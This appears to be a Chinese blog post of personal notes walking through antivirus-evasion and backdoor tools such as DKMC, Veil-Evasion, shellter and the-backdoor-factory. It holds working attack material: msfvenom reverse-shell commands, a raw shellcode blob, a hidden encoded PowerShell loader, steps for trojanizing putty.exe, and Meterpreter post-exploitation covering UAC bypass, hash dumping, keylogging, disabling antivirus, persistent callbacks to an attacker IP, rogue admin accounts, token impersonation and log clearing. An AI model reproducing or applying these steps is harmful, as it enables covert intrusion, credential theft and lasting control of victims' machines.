今天整理以前的笔记,把这部分工具整理了一下,虽然没有白利用稳,但这些工具也能在一定程度起到一定的免杀作用。
DKMC
项目地址:
可以创建一个 outputs 文件夹 存放 shellcode
启动
python dkmc.py
操作顺序:
Sc :是将 msf 生成的 raw 文件转换位 shellcode 代码
Gen :是将其 msf 的 shellcode 注入到 BMP 图片中
Ps :将其 BMP 的图片转换为 powershell 代码
Web :将其开启 web 功能
第一步,先生成原始的 shellcode
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.88.174 lport=7777 -e x86/shikata_ga_nai -i 16 -f raw -o /root/DKMC/dk
第二步,生成 shellcode ,将生成的 shellcode 保存到文本里,exit 退出
xdbxc3xb8xa4x85xc1x7dxd9x74x24xf4x5ex31xc9xb1xbbx83xeexfcx31x46x15x03x46x15x46x70x7fxa8x6bx01xd8x8exb0x2fxacx14xc2x8fx64x9cx9bx84xf4xf1x27xd5x8dx1cxd4x61x63xfdxfaxbax23xe1xb9xc7xebx94xb7x28x3cxd4xb1x88x12x39x15xcax37xcbxd2x6ax10xf9x60x8dx08xaax69xb2x5ex4bx1fx16x2cx74x50xb2xd7x88xe7x21x13xd6x29x40x06x24xfcx02x4cx8ax77x1fx5fxf5xedx47xb7x38x63xafx2ex6exbex22xedxa5xf8x61x8bx17x19xb7x46x63x28x96x73x70x94x93x44xcfxe5x92x68x34x2fx1fx61xaaxa2x87x79x29x9bxe3x59x3ax62xe1xf2x0fx3dxfcx5fxecxc5xeexe2xc1x56x38x1bx76x98x5exd4x02x92x81xd4x25xf0x46x68x67x2axc6x9dxf7x9bxf8x0cx35xcaxbbx48x70xe1x26x06xcex46x48x6dx34x99x1exa3x52x70x4dx41xa3x68x8fx4ax60x27xb5x21x74x76x82xf3x7dx58x5dxd6x07x6ax86xc2xaax72xd2x60xeex7fxadx3fx7dx3fxd1x7ax39xcdx5bx04xc2xc7x1cx28xbex89x5cxa9x9fx51xf7x7dxeax26x87x33x3dx96xb2x20x7fx30x92x72xc7x0cx03x5dxbaxebxd2x09x58xfbxfdxdexe1xf3xf3xa2x62xa5xeex2axebxcdx38xe9xb9x2dx51x98x79xaex85x25x1bxd9x08x95x86xb9xb6x31x7bx87xf5x56x8axd7x6fxddx79xb7x37xb0x27xebxdexdcx9bxaax59xccx0ex3fx9dxe6xc6x17x51x5ax87x4cxb9x43xa3xb2x55x83x0bx8axdbxa9xf8xeex3exf3xd3x5dxb4xf8x96x68x9fx1cx92xadx59x2cx56x0axeex5axf7x74x98x23xcexa1x4fxadx06xa4xddxa4xa8x18x45xe9x62x32x9dx14x6cxb7x4dx5ax0dx81xe2x3exbcx27x05xfcx60x25xc9xb9x96x57xccxefxa3x27x30x31xa8x5bxdax0fx13x28x6fx4ex69x4ax5cx99x31xd1xcfxa6x27x8fxd6xd0xc2xe4xf6x36xb8xefx63x81xf4xedxacxe3xa0xbax63x94x73x18xcfx9dx6cxe4x9dx75x2bxb2xeaxe2xb7xfex15x95x18x1fx25xfax66x50x2ex70xd8xf2x31xdfx93xe6xe0xfdx04x4fxc6xc9x4axb6xecx69x2axa5x13x9dx54x5ex5ax99xc0x23x49x31x96x6ex5fx87xa0x6dx6cx02x0fxa5x61xb7x8cx2fx94x6fx53x4excfx53x81xcdx87xa9x1axa5xe2x6exfcx0bxb7x01x4cxb1xdfx72x51xbexb2x39x70xe4xcfx12x45x79xc1x5exb4xa3xfax5dxc5x96xe8xacx28x5axd8xefx0ax12x4ex8fxabxb2x65x64x3dxa3xe5x61xf9x9fxe0x97x66x0bx44x9exc6xeex85xb6x5excex86xd7x52xc9x63x57x88x9dxddx07x37x6bxfbxb6x97xa3x8fx24xeax48xc5x6fxe9x93x3cx56xf9xd9x3cx90x59x7dx8exa4x47xc2x58xf5xa8xe4xdex82x0cx63xd2xebxbbxd0xe6xf0x82x2bx1exd0xefxb0x61xdbx39x01x61x32x31x1ax47x32xf1x72x68x20x7bxcdx1ax71x60xa5x32xd1x7bxccxe2xd3xa3xa0x5ax7dx44x1axecx48xc6x2bxb0x66x1axb1x84x59x62x88x49xa6x94xfcxc3xd2xebx7ax21xc6xacx01xb5xe7x65xe9xb2x12x31xf0xddxfex61x4axcaxebx03x90x3fxf4xdax88x51xbexe6x4dx3ex2dxf5x9fxb3xbcx06x92xbex8axc0xcax76x33x01x11x73xf8x1dx21xabx44xc2xfcx6ex2fxa6x8fx51xa0x94x63xcex02x69x0bx37xcaxa5x3ex90x3bx9ax10x2fxdbxcex4cxe1xd2xbb
第三步,启动 gen 功能,将 shellcode 注入到图片中,设备图片位置和 shellcode 参数,
output 文件夹下生成一个注入 shellcode 图片,exit 退出到菜单界面
第四步,将图片转换成 powershell 文件,保存成为 dk.ps1 格式
run
powershell.exe -nop -w hidden -enc JABoAGsAYwByAGEAbABsAEQAZAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAsAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAIgBIADQAcwBJAEMATABPADgAUAAxADAAQwAvAHoARQAxAE4AagBRADAATgBUAGcAeABOAGoATQB1AE8AVABVACEAdABWAFoAdABiAHgAbwA1AEUAUAA0AGUASwBmAC8AQgBxAGwAYgBhAFgAVwBuAFoAawBKACEAMgBFAFYASwBsAEUAUABMAFMAWAAhAHIAbABJACEAbAAzAFIAMQBGAGwAZABnAGQAdwA2AHIAVQBYADIANQB1AEUATgB2AG4AdgBOADEANQAyAGcAUwBpADAAVABYAFcANgA1AFEATgArAG0AYgBGAG4AbgBuAG4AOAAyAEUANwBTADcANAAvAEkAZQAzAEwAawBiAG0AKwBOAE0AeABFAFoASgBnAFgAaABZAGsAYQArAGIAMgArAFIANAB1AHQAUQBSAFIAUABpAE8AWABkAFUAZgBVAGwAawBuAEgARQBJAFMATgA1AEoAbABZAHcAZwB6AGgAVAA0AEsAMgBNAEgAegBKADkAdABYAE4AIQBiAE4ATgBMADAAUgBDAGEAVQBpAFcARwA5ADMAcwB5AFUAIQBtAEUAVwAvAGYAIQBjAFQARQBOAHIAUwBFAGEAYwBnAGYAWgA4ADgAawBqADYAVQAxAEIAUQArAFQAUwA2AGgAYwBpAFEANwA4AFQANQBFAHAANQB6AE8AYQBLADgATQBKAHMAMwBhAFQAUQBGAFUAbQBtAEkAMgBNADUAOQBsAEIARwAxAGcAWQBhADkAbABEAFAAagB1AFoAOAAvAHUALwA2AGcAcwBqAHMATQBUADIAYwBaADUAZABwAHoAZQAzAE4AdABJACEAbABqAHoAbAAyAGYAUABQAGwAMgB3ADYAdAA1AEMAcAA3AGIAWQBwAEcAUwBXAG8ANQBOADIARwBlAGkAdABoAGQAZQBDADAAMwBIADAATQBiAFYANwBxACEARgBaAGkAcABqADcAVwBJAHkAcQAzAFEAVQBtAEUAeQBKAFIAVgBaADIAbQBZAFcAUgA1ADIASwB6AGcAOQBrADMANABsAGkAQgBSAHAALwB3AFEAdAB6AEoAcgArACEANQBJAHUATQA4AEkARQBmAGUAbwBJAGkAaABtAHcAbgBEAEUAcwBCADUAIQAwAHEAbQBQAFYAQgAzAEwAIQBJAGQAZgBxACEAaQA1AHQAQwBGADgAZABCAHIAdwAzADIAWgArAG0AdQBkAHYASABVAG4AdABPAG8AWQA1AFEAZABZAG8AZwAxAGgAdAB2AEsASwBMAFQAeABkAC8AMgBXAGcAYQAyAFgAMQA4AFgAdABSAFcAbwBUAGoAeQBTAEsAeQBaAE0AZgBrAE0AdAAzACEAagB0AFYAIQArAFEAMwB5AEcAYwAhAE0AdgBJADcAVQBMAFAAZAA5AFQANgBvAEIAYQBXAEUAcwAxAEUAZwAxAHgANgA1AHoAcABUAEwAdwBoADIAUgBnADYAegBNAFkARABvAGwAegBPAFYAYgBaAGoAUQB4AGUAdQA5ADUAdQA2AFkAeQB1AHIAZgBQAGIATAB2ADkANwBsAGgATgA2AGMAQwBOAFoAUABGAHkAdAA4AHEAeQBxAHoAdQBUADYANABWAHMAMwB1ADQAbQBzADQAWQA5ADUAZQBnAEoAagBKAHUAQgBrAEwAbQBqAEMAbwBwAEsASwAzAHEAWgA2AHcAWgBoAEQAagBrADUAWQBtAHIAVQB4AFYATQA4AHQASgBpACEAKwAhAFEANABUAGEAbQB3AEYAIQBqAEoANAA2AFgAYQBhAE0ATABQADAAUABjADQAWQBqADAARQAxAEkAcQB5ADUAeABxAGkAUQBEAHYANwB6AFkAQgBaAEYAOQBkAHcATAAwAFkASQBFAGsAVgB6ADAAWABTAHoAZQBHACEAOAAhAGwATgBZAEYANgBlAGYAbAA3AHIAYQBQAFIAbQA2AFQAVQA2ADAARAAwAHMAbgB3AEIARQBZAEIANgBRAEgAbABFACEAZQBrAEkAVABRAHIAcABoAHEAWgBrAFgAbgBUAFgAWQBYAGIAeQByAGgAaABFAGQAVwBtAFgARwA3AG8AYgA0AEMAMAAyAEwAbwBwAGgAVABZAHEAaQA3AEQATwBDAE0ATgBWAEwANABXAEkAVQBXADUAUgBDAGMAZwBIAEYAcwBQAHgAdgBNAGMAbQBaAFEAagB1AFIAawB5AGEAbABIAE0AbQBKAHIAagBTAEgAZABZAEUAUgB5AHcAVwBQAFcAUABaAG8AegBEAGEAZwBpAGwAKwAyACEATgB6AGsAYQBRAGMARQByAFQASwBkAGUARwBNADAAdwBtAHEAUQBIAEcASwBjAHMATABSAEMAYwBUAHUAVAA4AEkAdABEADgAegBpAGQARgBpAE0AUwBuAEQAVwBnAHMAWABDADkANwBnADAAIQBiAGwAaAB5AHEARABTAFcATAB5AFgAbgBQAHUAUAAhAFoAVgBDAHMANAB5AHIAcQBhAEMAbwBtAEwAYwA0AGcAaQBWAEMAYgBVAEQAMQBnAGwARQBYAFoAaABsAG8AZwA1AEIAZwBCAGgAUgBMAGcAMgBNAG8AUwBRADkAegA2AHgAbABiAHcASgAhAEoAbAB0ADkAcgBiAHEAdQBaAFgARgBCAFgAdgBtAHMAdQB1AE4ASAB4ADMATgBpAHoANgBFAFQAOQBzAHoASAByAEgARgBzADEAZgA4AG4ANQBJAG8AdwBtAGEAcgBnAHcAUwBEAGgANQBMADcAaQBrADgAUQBrADEAMQBIAHMAegBOAFMAYQB0ADcAKwB6AHMANwBoADIARQBWAGYAegB0ADEAZwArAHIAaAA5AFUAZABtAFoAawAwAE0ANQBYAGQAdAArAC8AMgA5ADkAOABlADEAIQA3AGUAaABhAE0AawBmAFoATwBmAFQARwBjACsANgAvAEMAcgAwAFgAUQB0ADQAQgArAEoAWQBJAHMAcQBQAGEAVQBjAGcAMABkADEASwA2AGwANABKAHQAVgBaAEkAVgAhAGQAeQBhAHkASAA1ADkAbAByADcAQwBzAG8AIQBSAHkAVgBIAHUAKwBDAHMAbQB3AE4AegBtAFYAawA1AGQASQBxAEcAUwByADEAUQBqACsASAB5AE0ARgByAGIATgBiADIATgByAFoAOABzAGoAVAAwAFYAeQBwAGEARAB0AFgAcgAvADIAQwBNAFMASQBFAEMAcwB2ACEAagBpAEkAbQBaAEIAdABXAEgAVwByAFcASwBrAGwAZAA5ADIASwAvADYAcQB4AEwAKwBPAHIAVwBtAFQATwBkAGUAdQBWAHAAZwBWAGIATgBFAGEARwAwAFQAbgBtACsAeQB3AEUAOQAzAGUANQBmAC8ASwAzAGcARgBIADYAZgA0AEYALwA4AEMAdgBOAFgAWQBUADIAWgBmAEIAVwBnADEAVwBLAGIAOQBZAHUAYgA1AHcARwArAGgAKwA3AHUANQA5AHkAawB6AGEATgBoAEQATgBlAEsAdwBPACEAWQBiAEkAUwBpAG8AcwBuAGIATAAyAHIASQBnAEMAOABiAEYAWgA5ADgANgBuAC8AIQBJAHQAUABIAHkAMwBkADUAeQBqADIAegBwAEwAcwBaAGsATABXADMATgB2AHUARgBEAEIAMgBiAGsAMABGACsALwBaAGIAVwBoAHkAbABSAHUANQBRAGgAZgBSADYAbQA5AEIAegAyAG4ATAAyACsAZwBjADUAMwA0ADUATwBMADAATAAxAEwAMgB5AEIATwBwAFkAUAA0AE4AWABkAHYARAA1ADUASwBhAFoARgBhAEQAaQBKAE8ALwA4AGgANwBKAFAAZQBhAFIATAAvAEoASQB1AGgAIQBCAFAAbgBvAHEAZgA4AGgAUgByAGkANgAhADEAOABiADYAaAB2AG0AaQAxAGkAMgBmAC8AUgBkAGIAcQBvAE0AeQBKAHcAbwAhACEAIQA9AD0AIgAuAFIAZQBwAGwAYQBjAGUAKAAiACEAIgAsACAAIgBBACIAKQApACkAOwAgACQAZwBKAGQAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAoACQAaABrAGMAcgBhAGwAbABEAGQALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwAgAFsAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAF0AOgA6AEMAcgBlAGEAdABlACgAJABnAEoAZAApAC4ASQBuAHYAbwBrAGUAKAApAAoA
第五步,开启 web 功能,直接运行即可
>>> web (web)>>> set port 8080 [+] port value is set. (web)>>> run [+] Starting web server on port 8080 127.0.0.1 – – “GET /output-1496175261.bmp HTTP/1.1” 200 –
免杀测试
过特征检查,不过行为
msf shellcode 生成器和编码器-venom
项目地址:
git clone https://github.com/r00t-3xp10it/venom
使用:
shellcode 格式 都是以图形化 的方式呈现的,比较直观,悬着对应数字就行了。
输入 反弹 地址 lhost 和 端口 lport
选择 反弹 方式
输入 文件名
shellcode 生成之后 会自动 打开侦听器
生成的shellcode 在 /venom/output/ 目录下面
过特征,不过行为,可以实现短时间免杀,需要及时迁移进程
Green hat pro免杀工具使用
项目地址:https://github.com/Green-m/green-hat-suite
开始安装:
kali 上 安装:
gem install os apt-get install mingw-w64 apt-get install wine
windows上安装:
下载并install.ps1使用administartor权限运行。
安装将持续几个小时,请耐心等待。
使用
cd green-hat-suite/
ruby greenhat.rb 启动
短时间内天擎免杀,需要及时迁移进程避免被杀。
TheFatRat 免杀 工具
便捷化payload生成:
安装完成后使用fatrat命令启动
完全傻瓜式操作
设置文件名的时候无需加后缀!
avet 免杀 工具使用
进入 avet 文件夹内,进入 build 文件夹下,修改 global_connect_config.sh 文件,更改 kali IP 地址,端口 号为 7777,
运行: ./avet_fabric.py
免杀工具—Veil-Evasion
项目地址:https://github.com/Veil-Framework/Veil-Evasion Veil-Evasion是与Metasploit生成相兼容的Payload的一款辅助框架,并可以绕过大多 数的杀软。
git clone https://github.com/Veil-Framework/VeilEvasion.git
/setup.sh 安装
安装veil:
root@kali:~# apt-get update && apt-get install veil
启动veil:
root@kali:~# veil
Veil>: list 查看列表
[*] Available Tools:
1) Evasion
2) Ordnance
Veil>: use 1
Veil/Evasion>: list 查看具体的payload
Veil/Evasion>: use 9 使用序号为9的payload
[cs/meterpreter/rev_http>>]: options 查看需要配置的选项
set LHOST 192.168.199.165
[cs/meterpreter/rev_http>>]: generate 使用generate命令生成载荷文件
[>] Please enter the base name for output files (default is payload): backup 指定一个文件名backup
/var/lib/veil/output/compiled/backup.exe 生成的文件位置
接下来使用msf创建远程处理器
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.199.165
exploit
meterpreter> background 后台运行会话
sessions 查看会话详情
search bypassuac
use exploit/windows/local/bypassuac 使用本地提权模块
set SESSION 1
exploit
meterpreter>getuid 查看用户信息
meterpreter>getsystem 获取系统权限
run post/windows/gather/hashdump 获取hashdump
veil 启动veil
Main Menu
2 tools loaded 两个工具被加载
Available Tools: 可利用的工具
1) Evasion 规避免杀
2) Ordnance 工具箱
Available Commands:
exit Completely exit Veil 退出veil
info Information on a specific tool 查看工具详情
list List available tools 列出可用的工具
options Show Veil configuration 显示veil配置信息
update Update Veil 更新
use Use a specific tool 使用一个具体的工具
use 使用模块 1·
list 查看该模式下可用的payload
使用payload:use c/meterpreter/rev_tcp 或者use 7
设置反弹连接的ip以及端口
options 查看配置信息
generate 生成payload
输入要生成的文件名是veilshell.exe
veil 会同时生成多种场景的payload
[*] Language: c
[*] Payload Module: c/meterpreter/rev_tcp
[*] Executable written to: /var/lib/veil/output/compiled/veilshell.exe.exe 生成的可执行程序
[*] Source code written to: /var/lib/veil/output/source/veilshell.exe.c 生成的.c源文件
[*] Metasploit Resource file written to: /var/lib/veil/output/handlers/veilshell.exe.rc metasploit源文件
对于生成的.c源文件可以进行二次免杀处理,比如使用shellster 将shellcode注入可执行程序中等等。
shellter免杀
Kali Linux下安装shellter:
apt-get update
apt-get install shellter
启动shellter
(需要wine环境apt-get install wine32)
Kali 64位运行shellter会出错,原因是shellter只支持32位系统
kali linux 64位上安装32位的wine
在终端下输入
dpkg –add-architecture i386
apt-get update
apt-get install wine32
安装会有一个error提示 提示使用apt-get update来修复,那就继续输入apt-get update
apt-get install wine32
OK
这里我从百度下载一个putyy来进行测试,把它放在/root/目录下
安装好环境后启动shellter
root@kali:~# shelter
进入shellter控制台
这里有三个选项
A auto自动
M 高级设置
H help
这里我们使用A,PE Target输入exe程序的绝对路径
然后需要等待几分钟等待描绘完成
此处提示:是否进行注入,我们选择y
这里提示使用此处列表提供的payload还是使用自己设置,我们选择使用L
L list
C customs
H help
使用List索引1,即meterpreter_reverse_tcp(tcp反弹)
设置shellcode回连的IP以及端口,也就是我kali的ip和接收的端口8888
稍等片刻即可生成带有shellcode的putty.exe程序。
然后我们验证免杀效果(这里使用的是天擎的云查杀功能对该文件进行扫描无异常)
但是当我们点击程序进行运行的时候会报毒(这里猜测是天擎发现了程需主动回连行为,也就是基于行为的查杀)
然后我们打开msf设置攻击载荷,设置msf监听
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST 192.168.199.165(设置本地监听地址)
set LPORT 8888(设置本地监听端口)
exploit
此时我们运行包含shellcode的可执行程序,并开始攻击
可以看到已经接收到了我本机192.168.199.205的会话,不过后续连接被天擎阻断了,
过了几分钟弹出病毒提示。
论安装杀软的必要性
成功拿到shell
使用migrate进行进程注入,以保证对目标机器的持续控制,
只要tasklist进程不中断,meterpreter就不会断
监听键盘输入记录,或自动将结果保存到txt文件中
新开一个终端,切换到/root/.msf4/loot下查看键盘记录信息,完美记录!
获取用户名以及密码的hash
新开msf使用hash进行登录
OK,登录成功了
抓包并保存为cap文件,可以使用wireshake打开查看
收集系统信息
持久控制,设置后门每50秒外连一次
重启服务器,后门开机启动,成功回连我们kali的1111端口,成功拿到shell
针对服务器的持久控制
首先生成一个shellcode,并将其上传至服务器
安装服务器后门程序,然后删除shell.exe(相当于在服务器生成了msf服务了)
进行监听设置
Insanity 免杀
git clone https://github.com/4w4k3/Insanity-Framework.git
安装依赖
cd Insanity-Framework
chmod +x install.sh
./install.sh
Cloning:
git clone https://github.com/4w4k3/Insanity-Framework.git
Running:
sudo python insanity.py
If you have another version of Python:
sudo python2.7 insanity.py
后门工具—the-backdoor-factory
原理:可执行二进制文件中有大量的00,这些00是不包含数据的,将这些数据替换成 payload,并且在程序执行的时候,jmp到代码段,来触发payload。
安装
或者apt-get install backdoor-factory 安装
检测是否支持后门植入
root@kali:~/the-backdoor-factory# ./backdoor.py -f /root/putty.exe -S
-f:指定测试程序
-S:检查该程序是否支持 patch
在确定其支持patch 后,我们再来查看其是否支持我们指定的 shellcode patch
测试裂缝空间size 200
root@kali:~/the-backdoor-factory# ./backdoor.py -f /root/putty.exe -c -l 200
-c:code cave(代码裂缝)
-l:代码裂缝大小
查看可注入的payload
root@kali:~/the-backdoor-factory# ./backdoor.py -f /root/putty.exe -s show
插入payload,并生成文件。
root@kali:~/the-backdoor-factory# ./backdoor.py -f /root/putty.exe -s iat_reverse_tcp_stager_threaded -H 192.168.199.165 -P 4444
-s:选择使用 payload 类型
-H:选择回连服务器地址
-P:回连服务器端口
从返回结果可以看出putty.exe不能导入shellcode,我们使用之前metasploit生成的1111.exe的shell。
root@kali:~/the-backdoor-factory# ./backdoor.py -f /root/1111.exe -s iat_reverse_tcp_inline_threaded -H 192.168.199.165 -P 4444
ok,shellcode注入成功,新文件在backdoored目录下
对比原文件与生成文件MD5值
root@kali:~/the-backdoor-factory# md5sum backdoored/1111.exe /root/1111.exe
开启本地监听
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST 192.168.199.165
LHOST => 192.168.199.165
msf exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf exploit(multi/handler) > exploit
meterpreter持久控制PC机
进程迁移
run post/windows/manage/migrate(自动查找稳定的进程并切换)
关闭杀软
run killav
查看目标机所有流量
run packetrecorder -i 1
提取系统信息
run scraper
截屏、键盘记录、嗅探、获取域
持久控制
设置后门每50秒外连一次
run persistence -X -i 50 -p 1111 -r 192.168.199.165
run metsvc -A 安装后门
hashdump导出hash利用hash传送漏洞继续扩大战果。。。
输入shell进入cmd,创建简单的用户,当然实战中最好使用localgroup中已有的用户提升管理权限
顺便说一下,此处添加用户和将用户加入管理员组操作中使用ad,而没有使用add,主要是为了绕过部分防护软件的策略限制。
假冒令牌
假冒令牌攻击中需要使用kerberos协议,kerberos协议是一种网络认证协议,其设计目的是通过秘钥系统为客户机/服务器应用程序提供强大的认证服务。
使用impersonate_token假冒Administrator进行攻击(注意:用户名前两个反斜杠)
ok,可以看到假冒用户成功,此时就可以通过提升自己的权限在目标系统中进行任何操作了。
清除踪迹(清除日志)
